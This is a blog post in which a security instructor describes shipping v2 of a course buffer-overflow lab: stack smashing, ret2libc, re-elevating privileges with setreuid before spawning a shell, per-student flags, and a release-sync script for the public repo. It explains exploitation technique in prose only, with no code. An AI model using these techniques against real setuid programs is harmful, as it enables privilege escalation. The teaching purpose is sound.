Shipping a Buffer Overflow Lab, v2

I teach introductory computer security at CSULB, and every semester the buffer-overflow lab is the one students remember. Not because it’s the hardest — it isn’t — but because it’s the first time the abstract threat model in the textbook becomes a shell prompt they earned. This spring I shipped v2, and what started as “let me clean this up over an afternoon” consumed two full working days and taught me a few things worth writing down.

Three Concepts Instead of Two#

The original lab was essentially a modern restatement of Aleph One’s 1996 Smashing the Stack article: overflow a stack buffer, overwrite the saved instruction pointer, redirect execution. Classic. v1 added NX bypass via ret2libc (Solar Designer, 1997), which is a meaningful step up. v2 adds a third concept that the classic literature underplays: setuid privilege drop and re-elevation.

The setup: the vulnerable binary runs setuid. Students exploit it expecting to land a root shell. Except they don’t — at least not naively — because dash calls setuid(getuid()) at startup whenever the effective UID differs from the real UID. On Linux, when EUID ≠ RUID, the saved-set-UID drops with that call and there is no shell-side recovery path. This is not a bug in dash; it’s a deliberate security measure. It’s also exactly the kind of thing that makes “works in the tutorial, fails on the real binary” a rite of passage in exploit development.

The fix forces re-elevation before the shell starts. For the direct shellcode path, the code does a geteuid / setreuid dance so that RUID == EUID == the oracle’s UID by the time execve runs. For the ret2libc chain, there’s a setreuid call staged via a pop-pop-ret gadget before system("/bin/sh") fires. Students working the harder challenge (Omega) have to find that gadget in libc themselves — their first real taste of ROP-style gadget hunting, closer to CTF territory than anything in v1.

One other quiet change: strcpy became memcpy in the vulnerable function. Small UIDs produce NUL bytes in the seed-derived values that strcpy would truncate, silently breaking the copy. The unbounded copy is still the bug; only the copy primitive changed.

The Leak-Then-Pwn Integrity Problem#

v1’s cross-seed integrity check rested on a shaky premise: “an exploit hardcoded to seed A fails on seed B.” That’s true for naive exploits, but the lab teaches a leak-then-pwn technique that makes exploits universal by design — the binary tells you what you need to know, and you use it. Once students internalize that, the hardcoded-offset approach collapses as a uniqueness guarantee.

v2 rethinks this entirely. The new integrity model has two parts:

Flag uniqueness: the per-student honor flags are verified to be pairwise unique across the entire seed corpus. No two students get the same flag.
Portability sample: build seed A’s reference exploit, run it against seed B, and assert it captures seed B’s flag — not A’s. That’s the correct behavior; the exploit adapts, but the flag it retrieves is still unique to each student.

It’s a cleaner model because it tests what actually matters: that submission of someone else’s work produces the wrong flag.

The Repo Split#

This is the engineering I’m most satisfied with. The development repo contains the reference exploits, the cross-seed soak harness, instructor notes, and all the machinery I use to grade and verify the lab. None of that belongs in student hands. The old approach (keeping everything in one repo and hoping nobody explored the git history) was fine when I was the only person who ever cloned it, but is not fine for a GitHub Classroom template.

The solution is a release-sync script. At publish time it:

Checks out a signed release tag in the dev repo.
Assembles a clean student-facing tree using an explicit allowlist — only the files students are meant to have.
Runs a pre-flight scan over the staged tree and refuses to publish if it finds any INSTRUCTOR-ONLY markers.
Initializes a fresh git repo (one commit, no history), signs and tags it, and pushes it to the separate public repo that GitHub Classroom uses as its template.

Forking from a private branch was the obvious alternative, and I rejected it: forks copy the entire commit history. Even if the branch doesn’t exist anymore, the objects do. The clean-init approach gives students a repo with exactly one commit containing exactly the files on the allowlist. Nothing else reachable.

A Note on Codespaces Hygiene#

The lab delivers via GitHub Codespaces, and the per-student seed — which determines libc layout, leaked addresses, and the honor flag — is baked in at container build time. This created a new source of confusion worth calling out explicitly in the lab instructions: stop the Codespace, don’t delete it.

Stopping suspends the VM; it resumes instantly with all work intact. Deleting it wipes the disk, forces a full rebuild, AND invalidates the student’s prior work because the newly-built container has a different seed. A student who deletes their Codespace midway through effectively has to start over. I added a prominent warning. The kind you’d add to a piece of equipment that has a “this is not the off switch” button.

Also fixed a Docker cache thrashing bug in the same pass: ARG SEED was declared near the top of the Dockerfile, making it the first layer to bust the cache. Every per-seed build was re-running roughly 1 GB of apt installs. Deferring the declaration to right before first use means the heavy layer is shared across all seeds.

The Smoke-Alarm Insight#

The release sequence was a cascade: three patches, each one exposing the next downstream check. The funniest moment was the last one. The autograder kept failing on the template repository itself, and for a few minutes that looked like a bug. It isn’t. The template ships a placeholder writeup; the autograder computes the expected honor flag at runtime from the seed and gates on it. A failing honor-check on the template is the canonical proof that the detector works.

I wrote “smoke-alarm energy” in my notes: you want it to go off when you wave a match under it. The failure mode is the validation. If the template passed cleanly, that would mean the autograder wasn’t checking anything, which would be the actual bug.

The bigger payoff from this ship is the platform itself. The themed “mainframe” aesthetic — custom banner, MOTD, man pages, prompt — is now fully exercised as a Codespaces-only delivery vehicle with a clean public/private repo split and a release-sync script I can reuse for future labs. The next time I want to add a new concept to the course, the scaffolding is already there. That’s the part that makes the two-day overrun feel like an investment rather than a slip.